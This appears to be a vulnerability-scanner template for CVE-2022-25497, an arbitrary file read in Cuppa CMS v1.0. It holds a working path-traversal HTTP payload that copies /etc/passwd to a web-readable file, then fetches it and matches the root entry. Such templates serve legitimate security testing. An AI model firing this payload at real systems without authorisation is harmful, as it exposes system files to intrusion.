55 lines
1.6 KiB
YAML
55 lines
1.6 KiB
YAML
id: CVE-2022-25497
|
|
|
|
info:
|
|
name: Cuppa CMS v1.0 - Local File Inclusion
|
|
author: theamanrawat
|
|
severity: medium
|
|
description: |
|
|
CuppaCMS v1.0 was discovered to contain an arbitrary file read via the copy function.
|
|
remediation: |
|
|
Upgrade to the latest version of Cuppa CMS or apply the provided patch to fix the LFI vulnerability.
|
|
reference:
|
|
- https://github.com/CuppaCMS/CuppaCMS
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-25497
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
|
cvss-score: 5.3
|
|
cve-id: CVE-2022-25497
|
|
cwe-id: CWE-552
|
|
epss-score: 0.00611
|
|
epss-percentile: 0.76266
|
|
cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: cuppacms
|
|
product: cuppacms
|
|
tags: cve,cve2022,lfi,cuppa,intrusive
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /js/filemanager/api/index.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"from":"//../../../../../../../../../../../../../etc/passwd","to":"/../{{randstr}}.txt","action":"copyFile"}
|
|
- |
|
|
GET /{{randstr}}.txt HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header_2
|
|
words:
|
|
- text/plain
|
|
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100abeeaee7f63ef79456a3ba2c3f5be33a68ac11be800d13f4290e185bb374201302200c132579560f8a46c43cb152043eb2b73aa3f5a506d68bd71e182b3cb5918fd7:922c64590222798bb761d5b6d8e72950 |